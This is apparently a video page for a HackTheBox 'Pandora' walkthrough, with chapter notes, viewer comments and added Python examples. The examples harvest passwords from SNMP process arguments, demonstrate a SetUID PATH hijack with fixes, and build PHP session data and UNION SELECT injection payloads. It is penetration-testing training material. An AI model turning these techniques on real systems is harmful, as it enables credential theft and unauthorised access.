HackTheBox - Pandora

  • Published 26 Jun 2024
  • 00:00 - Intro
    00:58 - Start of nmap
    05:10 - Using nmap to scan SNMP
    07:20 - Doing an snmpwalk, talking about SNMP MIBs and how to install them, then using snmpbulkwalk to speed up the scan
    09:50 - Finding all the unique fields in our snmpwalk output with grep, sort, and uniq, which helps find fields of value
    16:00 - SNMP allowed us to view running processes on the box; a password was in a process's arguments, so we can SSH in
    18:50 - SSHing into the box and looking at the webserver files and configs
    20:35 - Looking at Apache's config and seeing there's a different site available only to localhost, doing an SSH tunnel to access it
    23:20 - Finding an unauthenticated Pandora FMS exploit via Google, playing with the injection manually
    27:45 - Using SQLMap to automatically dump the Pandora database
    36:45 - Testing sessions; should have used wfuzz or something to test all of these quickly
    37:30 - Using the UNION injection to log in as admin by placing the PHP-serialized session data it expects
    39:00 - With admin access to Pandora FMS we can upload a shell and get code execution
    43:33 - Going over LinPEAS results
    47:30 - Finding a custom SetUID file called Pandora_Backup
    49:00 - Running strings against the binary shows the tar command without an absolute path, so it is likely vulnerable to PATH hijacking (a bare tar resolves through our PATH); going into Ghidra to confirm
    50:45 - Showing the PATH hijack
    52:30 - The exploit didn't work because something isn't letting the SetUID bit take effect. Digging into it
    56:30 - Using SSH to log into the box and then running the exploit and seeing it works
    59:25 - Showing the intended way to exploit Pandora: just finding a valid session cookie, and then a command injection vulnerability in ajax.php
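
The SNMP enumeration at 07:20 through 16:00 (unique fields via grep/sort/uniq, then process names and arguments from HOST-RESOURCES-MIB), as an added Python example. This is not code from the video; the snmpwalk output it parses is constructed here, and the credential-looking flags it searches for are an assumption to extend for the target. It also decodes Hex-STRING values, which are often UTF-16LE:

```python
"""Added example (not from the video): parse snmpwalk/snmpbulkwalk output the way
the grep | sort | uniq step does, then join HOST-RESOURCES-MIB process rows by PID
and flag credentials passed on a command line.  The sample output below is
constructed, not captured from the box."""
import re
from collections import defaultdict

# Constructed sample, with MIB names resolved (as after installing the MIBs).
SNMP_SAMPLE = """\
SNMPv2-MIB::sysDescr.0 = STRING: Linux pandora 5.4.0-91-generic x86_64
SNMPv2-MIB::sysContact.0 = STRING: Daniel
HOST-RESOURCES-MIB::hrSWRunName.1 = STRING: "systemd"
HOST-RESOURCES-MIB::hrSWRunName.1033 = STRING: "bash"
HOST-RESOURCES-MIB::hrSWRunName.1034 = STRING: "sshd"
HOST-RESOURCES-MIB::hrSWRunPath.1 = STRING: "/sbin/init"
HOST-RESOURCES-MIB::hrSWRunPath.1033 = STRING: "/bin/bash"
HOST-RESOURCES-MIB::hrSWRunParameters.1 = STRING: ""
HOST-RESOURCES-MIB::hrSWRunParameters.1033 = STRING: "-c /usr/bin/host_check -u svc_monitor -p Winter2024"
HOST-RESOURCES-MIB::hrSWRunParameters.1034 = STRING: "-D"
SNMPv2-SMI::enterprises.999.1.1.0 = Hex-STRING: 50 00 41 00 53 00 53 00 57 00 4F 00 52 00 44 00 00 00
"""

# <field>.<instance index> = [<TYPE>: ]<value>
LINE_RE = re.compile(r"^(?P<field>\S+?)\.(?P<idx>\d+(?:\.\d+)*) = (?:(?P<type>[\w-]+): )?(?P<val>.*)$")


def decode_hex_string(val: str) -> str:
    """Hex-STRING values are often UTF-16LE (every other byte zero), e.g. printer credentials."""
    raw = bytes.fromhex(val)
    if len(raw) >= 2 and len(raw) % 2 == 0 and not any(raw[1::2]):
        return raw.decode("utf-16-le").rstrip("\x00")
    return raw.decode("latin-1").rstrip("\x00")


def parse(text: str):
    """Return (field, index, value) rows; quotes stripped, Hex-STRINGs decoded."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # continuation lines of multi-line values, blanks, noise
        val = m["val"].strip()
        if m["type"] == "Hex-STRING":
            val = decode_hex_string(val)
        elif len(val) >= 2 and val[0] == val[-1] == '"':
            val = val[1:-1]
        rows.append((m["field"], m["idx"], val))
    return rows


def unique_fields(rows):
    """The grep/sort/uniq step: which object types did the walk return at all?
    Without MIBs every row starts with `iso.3.6...` and this collapses to one entry,
    which is why installing the MIBs matters."""
    return sorted({field for field, _, _ in rows})


def processes(rows):
    """Join hrSWRunName / hrSWRunPath / hrSWRunParameters by PID (the instance index)."""
    procs = defaultdict(dict)
    for field, idx, val in rows:
        for suffix, key in (("hrSWRunName", "name"), ("hrSWRunPath", "path"),
                            ("hrSWRunParameters", "args")):
            if field.endswith("::" + suffix):
                procs[int(idx)][key] = val
    return dict(procs)


# Assumed list of flags that commonly carry a secret; extend for the target's tooling.
CRED_RE = re.compile(r"(?:^|\s)(?:-p|--password|--passwd|password|passwd|pwd)[ =:](\S+)", re.I)


def credential_hits(procs):
    """(pid, name, secret) for every process whose arguments look like they carry a password."""
    hits = []
    for pid in sorted(procs):
        m = CRED_RE.search(procs[pid].get("args", ""))
        if m:
            hits.append((pid, procs[pid].get("name", "?"), m.group(1)))
    return hits


if __name__ == "__main__":
    # Against a live target: snmpbulkwalk -v2c -c public TARGET > walk.txt, then parse(open("walk.txt").read())
    rows = parse(SNMP_SAMPLE)
    print("fields:", *unique_fields(rows), sep="\n  ")
    for pid, name, secret in credential_hits(processes(rows)):
        print(f"pid {pid} ({name}) passes a secret on its command line: {secret}")
```

The process join is the interesting part: hrSWRunName and hrSWRunParameters are separate tables keyed by PID, so the name of the program and the argument carrying the password only line up once you join on the instance index.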

Comments • 36

  • @readysetexploit 2 years ago +6

    Wow, I really thought the admin session stealing was the intended way and Pwnkit was the unintended, the more you know! Thanks for the video!

  • @danjo133 2 years ago +1

    Great video as always! Would recommend the tool 'q' for writing sql queries against csv-like files/output, very powerful! Nice tip with snmpbulkwalk, I just found what I wanted in the nmap sC output and stopped there. :)

  • @h4cker 2 years ago +4

    You deserve more than million subscribers 🙂❤️

  • @yurilsaps 2 years ago +1

    Loved so much this box

  • @iamnoob7267 1 year ago

    Lots of love from an OSCP dreamer boy from India......
    💌

  • @massylii 2 years ago

    Love u man

  • @blankdash_8087 2 years ago +12

    Hey ipp, you've made quite some improvements in the way you present, especially with the font size. If you can change the font to Fira Code Semi Bold the appearance will look much nicer. Moreover, fonts like Fira Code and Comic Sans help people with dyslexia and astigmatism read more clearly and reduce their chance of getting a headache while watching your videos.

  • @qd2500 2 years ago

    thanks a lot bro

  • @rakutenleo5057 1 year ago

    That's a really great video, and the detailed explanation of each step; thanks for this video.
    But I have one question about the final step of creating the SSH connection:
    why can 'sudo -l' execute after the SSH connection, but it fails when using the PHP reverse shell?
    Thank you.

  • @securiti 2 years ago +2

    Thanks for the content, ippsec, and for sharing your knowledge with the community!
    The machine was pretty straightforward. Personally, I struggled with the initial foothold, because I skipped the UDP scan in the enumeration phase. Finding the unauthenticated exploit / blog post was the hardest part of the box imo.
    Interesting! Didn't know about the unintended path via admin session stealing.
    Cheers

  • @muhammadghareeb399 2 years ago

    nice

  • @cansofcoke 2 years ago

    Can someone help me out here: what is the significance of adding the hostname to the hosts file? Could you have success just using the IP address?

  • @AvinashKumar-fe8xb 2 years ago +3

    Why did you put the "data" column (id_usuario|s:5:"admin";) in 3rd place (select 1,2,data), when sqlmap is clearly showing it's the 2nd column? Isn't it logical to follow the correct column match? I struggled with it, that's why I'm asking. After the matt login we can confirm that data is actually the 3rd column in the database; somehow sqlmap shows it in the incorrect order. The post-root insights were useful for why this box was so weird.

    • @readysetexploit 2 years ago +2

      I had the same question. If you look at sqlmap, as the information is being printed out vertically at first, it displays the columns correctly. But once they actually get printed out, sqlmap places them incorrectly. I am not sure why it happens but it could be one of those “don’t always trust automated tools”

    • @Xx-nd1rs 1 year ago +1

      You could try trial and error: put 'id_usuario|s:5:"admin";' in the first and second column and you will see it gives you 'Access is not granted'.

  • @recon0x7f16 1 year ago

    How are you connected to Pandora? I can't figure out how to do this.

  • @lucasrodriguez3795 2 years ago +1

    Hey ippsec, do you think you could install or create something that logs all the commands you do? Sometimes I like to talk about you with some of my friends, and finding the commands you use to show them can be frustrating. Thank you

  • @plushplush7635 2 years ago +1

    OK, got my answer about ssh mode

    • @FrancescoBellei 2 years ago +3

      I don't get it, can you explain? How did he get the ssh mode and which keys should I press? thx :)

    • @plushplush7635 2 years ago +4

      You press ~ then C

    • @ChristopherPelnar 1 year ago +1

      @@FrancescoBellei It wasn't working for me at first. Then I entered "ssh ~C" and pressed enter. The result was an error message: "ssh: Could not resolve hostname ~c: Name or service not known".
      Immediately after that I just typed "~C" without pressing enter, and I was taken into the "ssh>" menu.
      Weird, and I don't know why, but it worked.

  • @ssfdf7751 2 years ago

    First!

  • @FMisi 2 years ago +1

    05:10 - Using nmap to scan NMAP
    you mean SNMP

  • @servermadum7297 9 months ago

    Yes, it is an easy box :)

  • @kosmonautofficial296 2 years ago

    ayo

  • @yurilsaps 2 years ago

    usuario can be Spanish or Portuguese ;)

  • @razmjumehdi9069 2 years ago

    Excuse me, I can't find the "Pandora Room". Please send me the room ;)

  • @rozbrajaczpoziomow 2 years ago +1

    Haiio

  • @iwanabemw2 11 months ago

    "Easy" Box

  • @ellerionsnow3340 4 months ago

    When you don't have strings: grep -a -Eo '[[:print:]]{4,}' filename
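
The bare `tar` invocation found at 49:00 (with strings, or with the grep above) is exploitable because the shell resolves a command name through the caller's PATH, and the caller of a SetUID binary is the attacker. The following added Python example is not the box's binary: backup_like() stands in for its system() call, and the fake tar, the marker file and the temp dir are created on the fly. It runs the vulnerable form beside the two fixes:

```python
"""Added example (not the box's binary): why a SetUID helper that runs `tar` by bare name
is hijackable through PATH, and that an absolute path or a sanitized PATH closes it.
backup_like() is a stand-in for the binary's system() call."""
import pathlib
import subprocess
import tempfile


def backup_like(cmd: str, path_env: str) -> int:
    """Stand-in for the helper's system("tar ...") call: /bin/sh resolves a bare command
    name through whatever PATH the (unprivileged) caller hands it."""
    return subprocess.run(cmd, shell=True, env={"PATH": path_env},
                          stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL).returncode


def run_hijack_demo() -> tuple:
    """Run three variants and report whether the planted `tar` executed for each:
    (bare name + attacker PATH, absolute path + attacker PATH, bare name + sanitized PATH)."""
    with tempfile.TemporaryDirectory() as workdir:
        marker = pathlib.Path(workdir, "ran")
        fake_tar = pathlib.Path(workdir, "tar")
        # On the box this would copy /bin/bash and set it SetUID; here it only leaves a marker.
        fake_tar.write_text(f"#!/bin/sh\n: > '{marker}'\n")
        fake_tar.chmod(0o755)
        attacker_path = f"{workdir}:/usr/bin:/bin"
        variants = (
            ("tar --version", attacker_path),           # as in the vulnerable binary
            ("/usr/bin/tar --version", attacker_path),  # fix 1: absolute path
            ("tar --version", "/usr/bin:/bin"),         # fix 2: sanitized PATH
        )
        results = []
        for cmd, path_env in variants:
            backup_like(cmd, path_env)
            results.append(marker.exists())
            marker.unlink(missing_ok=True)
        return tuple(results)


if __name__ == "__main__":
    print("hijacked:", dict(zip(("bare", "absolute", "sanitized"), run_hijack_demo())))
```

Only the first variant runs the planted file. Note that this demonstrates command resolution as an unprivileged process; the separate problem at 52:30, where the SetUID bit did not take effect from the web shell, is about the process that runs the binary, not about how tar is found.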

  • @sand3epyadav 2 years ago

    Wawoo, blacklisted....

  • @x.plorer 2 years ago +1

    Please make shorter videos, 1 hr is huge 😥

  • @plushplush7635 2 years ago +1

    Yes, SNMP! When the printer has "Access" as "50 00 41 00 53 00 53 00 57 00 4f 00 52 00 44,00,00,00"

  • @Xx-nd1rs 1 year ago

    Thanks ippsec, you're the best as always. Is there a way to find 'id_usuario|s:5:"admin";' without sqlmap? Since it is not allowed on the OSCP.
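
On the question above and the earlier thread about column order: the string 'id_usuario|s:5:"admin";' is a PHP session record (one `key|serialize(value)` pair per session variable), which is why it can be written into the UNION column rather than found. The Python below is an added example, not code from the video or from Pandora FMS. It encodes and decodes such records and lays a value into a chosen column of an n-column UNION SELECT; union_payload() assumes a single-quoted string injection point and assumes no table or column names, and strings are treated as ASCII (PHP's s:N counts bytes). Which column the application actually reads is found by trial, as the earlier thread notes:

```python
"""Added example (not from the video or Pandora FMS): PHP session serialization and
a UNION SELECT payload builder.  Strings are treated as ASCII."""


def php_serialize(value) -> str:
    """Serialize a Python value in PHP serialize() notation (bool, int, None, str, dict)."""
    if isinstance(value, bool):
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if value is None:
        return "N;"
    if isinstance(value, str):
        return f's:{len(value.encode())}:"{value}";'
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f"a:{len(value)}:{{{body}}}"
    raise TypeError(f"unsupported type: {type(value).__name__}")


def php_session_encode(session: dict) -> str:
    """PHP's default session serializer: `key|value` per variable, no separator between them."""
    return "".join(f"{key}|{php_serialize(value)}" for key, value in session.items())


class _Reader:
    """Cursor over a serialized string; value() consumes one PHP value."""

    def __init__(self, data: str):
        self.data, self.pos = data, 0

    def value(self):
        tag = self.data[self.pos]
        if tag == "N":
            self.pos += 2
            return None
        if tag in "ib":
            end = self.data.index(";", self.pos)
            num = int(self.data[self.pos + 2:end])
            self.pos = end + 1
            return bool(num) if tag == "b" else num
        if tag == "s":
            colon = self.data.index(":", self.pos + 2)
            length = int(self.data[self.pos + 2:colon])
            start = colon + 2                 # skip :"
            self.pos = start + length + 2     # skip ";
            return self.data[start:start + length]
        if tag == "a":
            colon = self.data.index(":", self.pos + 2)
            count = int(self.data[self.pos + 2:colon])
            self.pos = colon + 2              # skip :{
            out = {}
            for _ in range(count):
                key = self.value()
                out[key] = self.value()
            self.pos += 1                     # skip }
            return out
        raise ValueError(f"unknown tag {tag!r} at offset {self.pos}")


def php_session_decode(data: str) -> dict:
    """Inverse of php_session_encode(); use it on session rows pulled out of the database."""
    reader, out = _Reader(data), {}
    while reader.pos < len(data):
        bar = data.index("|", reader.pos)
        key = data[reader.pos:bar]
        reader.pos = bar + 1
        out[key] = reader.value()
    return out


def union_payload(n_cols: int, column: int, value: str, prefix: str = "1'") -> str:
    """Place `value` in the 1-based `column` of an n-column UNION SELECT, numbering the
    other cells so the response shows which positions are reflected."""
    if not 1 <= column <= n_cols:
        raise ValueError("column out of range")
    cells = [str(i) for i in range(1, n_cols + 1)]
    cells[column - 1] = "'" + value.replace("\\", "\\\\").replace("'", "''") + "'"
    return f"{prefix} UNION SELECT {','.join(cells)}-- -"


if __name__ == "__main__":
    record = php_session_encode({"id_usuario": "admin"})
    print(record)                                   # id_usuario|s:5:"admin";
    print(php_session_decode(record))
    for col in range(1, 4):                         # trial-and-error over column positions
        print(union_payload(3, col, record))
```

The decoder is what you would run over session rows dumped by hand with a UNION SELECT instead of sqlmap: it turns the stored blob back into the variables the application will trust.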

  • @r4nd0m4rest 1 year ago

    Thank you for this and all your videos @IppSec.
    I am running into problems with the public/private key usage for the user matt.
    I have followed your steps multiple times, but whenever I try (ssh -i matt matt@10.10.11.136) to SSH from my Kali machine to the Pandora machine using the private key I created, it always asks for a password.
    Has anyone else run into this problem?
    Any help from anyone would be greatly appreciated.

    • @Cyber-Mantra 2 months ago

      Yes, I am facing the same problem. Even reset the machine a couple of times, but not sure why it's not working...